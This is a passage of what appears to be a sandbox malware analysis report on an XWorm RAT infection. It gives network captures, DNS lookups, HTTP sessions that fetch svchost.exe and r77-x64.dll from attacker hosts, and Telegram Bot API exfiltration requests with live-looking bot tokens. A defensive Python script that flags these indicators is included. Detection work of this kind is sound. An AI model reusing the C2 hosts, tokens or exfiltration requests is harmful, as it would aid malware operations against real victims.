Sep 3, 2024 06:19:39.408868074 CEST | 49807 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:39.413769960 CEST | 7812 | 49807 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:19:39.415201902 CEST | 49807 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:40.664395094 CEST | 49799 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:19:40.664674997 CEST | 49808 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:19:40.669130087 CEST | 7812 | 49799 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:19:40.669410944 CEST | 7812 | 49808 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:19:40.669488907 CEST | 49808 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:19:40.669800043 CEST | 49808 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:19:40.674552917 CEST | 7812 | 49808 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:19:43.440099955 CEST | 49804 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:43.444988012 CEST | 7812 | 49804 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:19:49.659141064 CEST | 49804 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:49.664518118 CEST | 7812 | 49804 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:19:53.529119968 CEST | 7812 | 49804 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:19:53.529196024 CEST | 49804 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:54.663985968 CEST | 49804 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:54.670228004 CEST | 49813 | 7812 | 192.168.2.5 | 167.99.94.206
Sep 3, 2024 06:19:54.866576910 CEST | 7812 | 49804 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:19:54.866595030 CEST | 7812 | 49813 | 167.99.94.206 | 192.168.2.5
Sep 3, 2024 06:19:54.866688013 CEST | 49813 | 7812 | 192.168.2.5 | 167.99.94.206
Sep 3, 2024 06:19:54.951493979 CEST | 49813 | 7812 | 192.168.2.5 | 167.99.94.206
Sep 3, 2024 06:19:54.956338882 CEST | 7812 | 49813 | 167.99.94.206 | 192.168.2.5
Sep 3, 2024 06:20:00.792156935 CEST | 7812 | 49807 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:20:00.792234898 CEST | 49807 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:20:02.043994904 CEST | 7812 | 49808 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:20:02.045233011 CEST | 49808 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:20:09.144547939 CEST | 49807 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:20:09.149671078 CEST | 7812 | 49807 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:20:10.314866066 CEST | 49813 | 7812 | 192.168.2.5 | 167.99.94.206
Sep 3, 2024 06:20:10.319773912 CEST | 7812 | 49813 | 167.99.94.206 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 3, 2024 06:15:57.782038927 CEST | 51752 | 53 | 192.168.2.5 | 1.1.1.1
Sep 3, 2024 06:15:57.788871050 CEST | 53 | 51752 | 1.1.1.1 | 192.168.2.5
Sep 3, 2024 06:15:57.944814920 CEST | 54854 | 53 | 192.168.2.5 | 1.1.1.1
Sep 3, 2024 06:15:57.951626062 CEST | 53 | 54854 | 1.1.1.1 | 192.168.2.5
Sep 3, 2024 06:16:34.481887102 CEST | 55922 | 53 | 192.168.2.5 | 1.1.1.1
Sep 3, 2024 06:16:34.515762091 CEST | 53 | 55922 | 1.1.1.1 | 192.168.2.5
Sep 3, 2024 06:16:38.322066069 CEST | 60863 | 53 | 192.168.2.5 | 1.1.1.1
Sep 3, 2024 06:16:38.330868959 CEST | 53 | 60863 | 1.1.1.1 | 192.168.2.5
Sep 3, 2024 06:16:38.379817009 CEST | 58475 | 53 | 192.168.2.5 | 1.1.1.1
Sep 3, 2024 06:16:38.386482954 CEST | 53 | 58475 | 1.1.1.1 | 192.168.2.5
Sep 3, 2024 06:16:38.910878897 CEST | 60169 | 53 | 192.168.2.5 | 1.1.1.1
Sep 3, 2024 06:16:38.935110092 CEST | 53 | 60169 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 3, 2024 06:15:57.782038927 CEST | 192.168.2.5 | 1.1.1.1 | 0xfd3 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Sep 3, 2024 06:15:57.944814920 CEST | 192.168.2.5 | 1.1.1.1 | 0x85c3 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Sep 3, 2024 06:16:34.481887102 CEST | 192.168.2.5 | 1.1.1.1 | 0xf119 | Standard query (0) | payloads-poison.000webhostapp.com | A (IP address) | IN (0x0001) | false
Sep 3, 2024 06:16:38.322066069 CEST | 192.168.2.5 | 1.1.1.1 | 0x7756 | Standard query (0) | 201.75.14.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Sep 3, 2024 06:16:38.379817009 CEST | 192.168.2.5 | 1.1.1.1 | 0xfe36 | Standard query (0) | icanhazip.com | A (IP address) | IN (0x0001) | false
Sep 3, 2024 06:16:38.910878897 CEST | 192.168.2.5 | 1.1.1.1 | 0x641d | Standard query (0) | api.mylnikov.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 3, 2024 06:15:57.788871050 CEST | 1.1.1.1 | 192.168.2.5 | 0xfd3 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 06:15:57.951626062 CEST | 1.1.1.1 | 192.168.2.5 | 0x85c3 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 06:16:34.515762091 CEST | 1.1.1.1 | 192.168.2.5 | 0xf119 | No error (0) | payloads-poison.000webhostapp.com | us-east-1.route-1.000webhost.awex.io |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 3, 2024 06:16:34.515762091 CEST | 1.1.1.1 | 192.168.2.5 | 0xf119 | No error (0) | us-east-1.route-1.000webhost.awex.io |  | 145.14.144.231 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 06:16:38.330868959 CEST | 1.1.1.1 | 192.168.2.5 | 0x7756 | Name error (3) | 201.75.14.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Sep 3, 2024 06:16:38.386482954 CEST | 1.1.1.1 | 192.168.2.5 | 0xfe36 | No error (0) | icanhazip.com |  | 104.16.185.241 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 06:16:38.386482954 CEST | 1.1.1.1 | 192.168.2.5 | 0xfe36 | No error (0) | icanhazip.com |  | 104.16.184.241 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 06:16:38.935110092 CEST | 1.1.1.1 | 192.168.2.5 | 0x641d | No error (0) | api.mylnikov.org |  | 172.67.196.114 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 06:16:38.935110092 CEST | 1.1.1.1 | 192.168.2.5 | 0x641d | No error (0) | api.mylnikov.org |  | 104.21.44.66 | A (IP address) | IN (0x0001) | false
                                                  • api.telegram.org
                                                  • payloads-poison.000webhostapp.com
                                                  • api.mylnikov.org
                                                  • ip-api.com
                                                  • 91.134.207.16
                                                  • icanhazip.com
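The packet, DNS and HTTP tables in this section carry four indicators worth automating: repeated connections to port 7812 on several different servers (the RAT's C2 port), lookups of public external-IP and geolocation services, a Telegram Bot API request that carries the bot token in the URL, and an executable named svchost.exe fetched from a bare IP address. The script below is an added example, not part of the Joe Sandbox report and not the sample's own code; its record lists are constructed by hand from rows in this section, and the "common ports" set, the list of lookup services and the two-host threshold are assumptions.

```python
"""Network-indicator triage over rows of this report.

Added example (not Joe Sandbox code, not the sample's code). The record
lists are constructed by hand from the packet, DNS and HTTP tables in
this section; the port set, service list and threshold are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# --- constructed input, copied from rows in this report --------------------
TCP_FLOWS = [  # (src_ip, src_port, dst_ip, dst_port), one per client connection
    ("192.168.2.5", 49757, "167.99.94.206", 7812),
    ("192.168.2.5", 49763, "146.190.29.250", 7812),
    ("192.168.2.5", 49758, "64.23.232.116", 7812),
    ("192.168.2.5", 49767, "165.227.91.90", 7812),
    ("192.168.2.5", 49778, "185.252.232.158", 7812),
    ("192.168.2.5", 49706, "208.95.112.1", 80),
    ("192.168.2.5", 49705, "149.154.167.220", 443),
]
DNS_QUERIES = ["api.telegram.org", "ip-api.com", "payloads-poison.000webhostapp.com",
               "201.75.14.0.in-addr.arpa", "icanhazip.com", "api.mylnikov.org"]
HTTP_REQUESTS = [  # (process, Host header, request line)
    (r"C:\Users\user\AppData\Roaming\Window Security.exe", "ip-api.com", "GET /json/ HTTP/1.1"),
    (r"C:\Users\user\AppData\Roaming\Window Security.exe", "91.134.207.16", "GET /svchost.exe HTTP/1.1"),
    (r"C:\Users\user\AppData\Roaming\update.exe", "icanhazip.com", "GET / HTTP/1.1"),
    (r"C:\Users\user\AppData\Roaming\crack.exe", "api.telegram.org",
     "GET /bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage"
     "?chat_id=5881759996&text=This+Not+RDP HTTP/1.1"),
]

# --- assumptions ------------------------------------------------------------
COMMON_PORTS = {53, 80, 443}                      # never treated as beacon ports
IP_LOOKUP_SERVICES = {"ip-api.com", "icanhazip.com", "api.mylnikov.org"}  # external-IP / geo recon
BOT_API_RE = re.compile(r"/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")
BARE_IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def beacon_ports(flows, min_hosts=2):
    """Map each non-standard destination port to the distinct servers it was
    used against; a port reused across >= min_hosts servers is the C2 port."""
    hosts = defaultdict(set)
    for _src, _sport, dst, dport in flows:
        if dport not in COMMON_PORTS:
            hosts[dport].add(dst)
    return {p: sorted(h) for p, h in hosts.items() if len(h) >= min_hosts}


def recon_lookups(queries):
    """DNS names that belong to public 'what is my IP' / geolocation services."""
    return sorted(q for q in set(queries) if q in IP_LOOKUP_SERVICES)


def telegram_exfil(requests):
    """Pull bot id, method and chat_id out of Telegram Bot API requests.
    The token is cut down to its first and last four characters so the
    finding can be shared without republishing a live credential."""
    hits = []
    for proc, host, line in requests:
        if host != "api.telegram.org":
            continue
        path = line.split(" ", 2)[1]          # request-target of the request line
        m = BOT_API_RE.search(path)
        if not m:
            continue
        bot_id, token, method = m.groups()
        qs = parse_qs(urlparse(path).query)
        hits.append({"process": proc, "bot_id": bot_id, "method": method,
                     "token": token[:4] + "..." + token[-4:],
                     "chat_id": qs.get("chat_id", [None])[0]})
    return hits


def exe_from_bare_ip(requests):
    """Executables fetched straight from an IP literal; here the payload is
    served under the system-binary name svchost.exe."""
    out = []
    for _proc, host, line in requests:
        path = line.split(" ", 2)[1]
        if BARE_IPV4_RE.fullmatch(host) and path.lower().endswith(".exe"):
            out.append((host, path))
    return out


def triage():
    """All four checks in one dictionary, keyed by finding type."""
    return {"c2_ports": beacon_ports(TCP_FLOWS),
            "recon": recon_lookups(DNS_QUERIES),
            "telegram": telegram_exfil(HTTP_REQUESTS),
            "downloads": exe_from_bare_ip(HTTP_REQUESTS)}


if __name__ == "__main__":
    for key, val in triage().items():
        print(f"{key}: {val}")
```

Run as a script it reports port 7812 with its five servers, the three lookup services, the Telegram request with chat_id 5881759996 and a redacted token, and the svchost.exe download from 91.134.207.16. In a real pipeline the same four checks would read Zeek or Suricata conn, dns and http logs instead of hand-copied rows; the redaction is deliberate, because the token in the request line is a working Bot API credential.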
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49706 | 208.95.112.1 | 80 | 2680 | C:\Users\user\AppData\Roaming\Window Security.exe
Timestamp | Bytes transferred | Direction | Data
Sep 3, 2024 06:15:57.960913897 CEST | 144 | OUT | GET /json/ HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                                  Host: ip-api.com
                                                  Connection: Keep-Alive
Sep 3, 2024 06:15:58.406819105 CEST | 482 | IN | HTTP/1.1 200 OK
                                                  Date: Tue, 03 Sep 2024 04:15:58 GMT
                                                  Content-Type: application/json; charset=utf-8
                                                  Content-Length: 305
                                                  Access-Control-Allow-Origin: *
                                                  X-Ttl: 60
                                                  X-Rl: 44
                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                  Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49707 | 208.95.112.1 | 80 | 5352 | C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe
Timestamp | Bytes transferred | Direction | Data
Sep 3, 2024 06:16:03.519687891 CEST | 144 | OUT | GET /json/ HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                                  Host: ip-api.com
                                                  Connection: Keep-Alive
Sep 3, 2024 06:16:03.967185974 CEST | 482 | IN | HTTP/1.1 200 OK
                                                  Date: Tue, 03 Sep 2024 04:16:03 GMT
                                                  Content-Type: application/json; charset=utf-8
                                                  Content-Length: 305
                                                  Access-Control-Allow-Origin: *
                                                  X-Ttl: 54
                                                  X-Rl: 43
                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                  Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49722 | 91.134.207.16 | 80 | 2680 | C:\Users\user\AppData\Roaming\Window Security.exe
Timestamp | Bytes transferred | Direction | Data
Sep 3, 2024 06:16:35.411418915 CEST | 74 | OUT | GET /svchost.exe HTTP/1.1
                                                  Host: 91.134.207.16
                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49723 | 104.16.185.241 | 80 | 1632 | C:\Users\user\AppData\Roaming\update.exe
Timestamp | Bytes transferred | Direction | Data
Sep 3, 2024 06:16:38.412154913 CEST | 63 | OUT | GET / HTTP/1.1
                                                  Host: icanhazip.com
                                                  Connection: Keep-Alive
Sep 3, 2024 06:16:38.851185083 CEST | 534 | IN | HTTP/1.1 200 OK
                                                  Date: Tue, 03 Sep 2024 04:16:38 GMT
                                                  Content-Type: text/plain
                                                  Content-Length: 12
                                                  Connection: keep-alive
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET
                                                  Set-Cookie: __cf_bm=pN4VYA6YPabcOzUXO72BTEWWjnOJtEhcrN.Ya8_iJ1E-1725336998-1.0.1.1-eOapmP4uZ4ta83gObHuFv68xLSciDl2s5ABdxhY_QgZd84V1_CzDpc_G3GYBw7.dwmtRbg8SkS4dc4QDJEsdhg; path=/; expires=Tue, 03-Sep-24 04:46:38 GMT; domain=.icanhazip.com; HttpOnly
                                                  Server: cloudflare
                                                  CF-RAY: 8bd2ecf28d81c413-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                  Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49724 | 104.16.185.241 | 80 | 1716 | C:\Users\user\AppData\Roaming\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 3, 2024 06:16:38.430104971 CEST | 63 | OUT | GET / HTTP/1.1
                                                  Host: icanhazip.com
                                                  Connection: Keep-Alive
Sep 3, 2024 06:16:38.879524946 CEST | 534 | IN | HTTP/1.1 200 OK
                                                  Date: Tue, 03 Sep 2024 04:16:38 GMT
                                                  Content-Type: text/plain
                                                  Content-Length: 12
                                                  Connection: keep-alive
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET
                                                  Set-Cookie: __cf_bm=ESrvyBH06a6s10B_EJYHoCaukxeaMZp_K1Hv0l5VrZw-1725336998-1.0.1.1-IcD.iR0xoZZUQDBJT7DGmHIam7kQ8NBXCFzFIM76xDH2iJu4xV6jX.W3HMbs.pFPD1u2miKev1ncw20rpUCwHQ; path=/; expires=Tue, 03-Sep-24 04:46:38 GMT; domain=.icanhazip.com; HttpOnly
                                                  Server: cloudflare
                                                  CF-RAY: 8bd2ecf2a9df19b2-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                  Data Ascii: 8.46.123.33


                                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                  5          | 192.168.2.5 | 49740       | 91.134.207.16  | 80               | 2680 | C:\Users\user\AppData\Roaming\Window Security.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Sep 3, 2024 06:16:56.779481888 CEST | 74 | OUT | GET /svchost.exe HTTP/1.1
                                                  Host: 91.134.207.16
                                                  Connection: Keep-Alive


                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                  0          | 192.168.2.5 | 49705       | 149.154.167.220 | 443              | 5972 | C:\Users\user\AppData\Roaming\crack.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-03 04:15:58 UTC | 164 | OUT | GET /bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP HTTP/1.1
                                                  Host: api.telegram.org
                                                  Connection: Keep-Alive
                                                  2024-09-03 04:15:58 UTC | 388 | IN | HTTP/1.1 200 OK
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:15:58 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 300
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-03 04:15:58 UTC | 300 | IN | Data Ascii: {"ok":true,"result":{"message_id":310366,"from":{"id":5904946097,"is_bot":true,"first_name":"Vilva789","username":"Vilva814bot"},"chat":{"id":5881759996,"first_name":"BTC USDT","last_name":"FLASH\ud83d\udd25","username":"flashusdtbtcsender","type":"privat


                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                  1          | 192.168.2.5 | 49708       | 149.154.167.220 | 443              | 7140 | C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-03 04:16:05 UTC | 449 | OUT | GET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE126416575CB5DA0505E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20HGRRGE87%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
                                                  Host: api.telegram.org
                                                  Connection: Keep-Alive
                                                  2024-09-03 04:16:05 UTC | 346 | IN | HTTP/1.1 400 Bad Request
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:16:05 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 56
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-03 04:16:05 UTC | 56 | IN | Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                  2          | 192.168.2.5 | 49721       | 145.14.144.231 | 443              | 2680 | C:\Users\user\AppData\Roaming\Window Security.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-03 04:16:35 UTC | 94 | OUT | GET /r77-x64.dll HTTP/1.1
                                                  Host: payloads-poison.000webhostapp.com
                                                  Connection: Keep-Alive
                                                  2024-09-03 04:16:35 UTC | 281 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 03 Sep 2024 04:16:35 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 20319
                                                  Connection: close
                                                  ETag: "65dc8956-4f5f"
                                                  Server: awex
                                                  X-Xss-Protection: 1; mode=block
                                                  X-Content-Type-Options: nosniff
                                                  X-Request-ID: a049bd78bd228879c6cc6d046cfde157
                                                  2024-09-03 04:16:35 UTC | 16103 | IN | Data Ascii: <!doctype html><html lang="en-us"><head> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.get
                                                  2024-09-03 04:16:35 UTC | 4216 | IN | Data Ascii: 000webhost.com/static/default.000webhost.com/images/cdn/corgi-eating-a-cassette.svg" class="main-image" alt="Dog eating cassette tape"> </div> <div class="scroll-holder"> <div class="icon-scroll"></div> <span class=


                                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                  3          | 192.168.2.5 | 49726       | 172.67.196.114 | 443              | 1716 | C:\Users\user\AppData\Roaming\svchost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-03 04:16:39 UTC | 112 | OUT | GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
                                                  Host: api.mylnikov.org
                                                  Connection: Keep-Alive
                                                  2024-09-03 04:16:40 UTC | 785 | IN | HTTP/1.1 200 OK
                                                  Date: Tue, 03 Sep 2024 04:16:40 GMT
                                                  Content-Type: application/json; charset=utf8
                                                  Content-Length: 88
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Cache-Control: max-age=2678400
                                                  CF-Cache-Status: MISS
                                                  Last-Modified: Tue, 03 Sep 2024 04:16:40 GMT
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GDrwTUuoNr%2BbET8Re0%2Fl0Td0fmw6h%2B77ndMI1%2BAtqrpPuyQ2pV9R5jHNSQcvlaPp3GrNzFAc2ltVXxxjJXPoFfAJZxqm4E94bb3OO3UutVdc994HEW64TJwtt2gP%2BfLXfe%2FH"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Strict-Transport-Security: max-age=0; preload
                                                  X-Content-Type-Options: nosniff
                                                  Server: cloudflare
                                                  CF-RAY: 8bd2ecf8999e1829-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-03 04:16:40 UTC | 88 | IN | Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1725337000}


                                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                  4          | 192.168.2.5 | 49725       | 172.67.196.114 | 443              | 1632 | C:\Users\user\AppData\Roaming\update.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-03 04:16:39 UTC | 112 | OUT | GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
                                                  Host: api.mylnikov.org
                                                  Connection: Keep-Alive
                                                  2024-09-03 04:16:40 UTC | 782 | IN | HTTP/1.1 200 OK
                                                  Date: Tue, 03 Sep 2024 04:16:40 GMT
                                                  Content-Type: application/json; charset=utf8
                                                  Content-Length: 88
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Cache-Control: max-age=2678400
                                                  CF-Cache-Status: HIT
                                                  Age: 0
                                                  Last-Modified: Tue, 03 Sep 2024 04:16:40 GMT
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u0ImaJWwwcPzej7nFR10GJ%2BObq0yGpVZ1fR6plGExNDjiqh3gvqhtaYQzRl0t20I4snO0BtrbzRDTMXeDXHdEyfhi8vXtxuRzbkcTPZDOTvEKisvAMzTc5N9RH7iiBZlZ45q"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Strict-Transport-Security: max-age=0; preload
                                                  X-Content-Type-Options: nosniff
                                                  Server: cloudflare
                                                  CF-RAY: 8bd2ecf9a874c35d-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-03 04:16:40 UTC | 88 | IN | Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1725337000}


                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                  5          | 192.168.2.5 | 49728       | 149.154.167.220 | 443              | 1716 | C:\Users\user\AppData\Roaming\svchost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
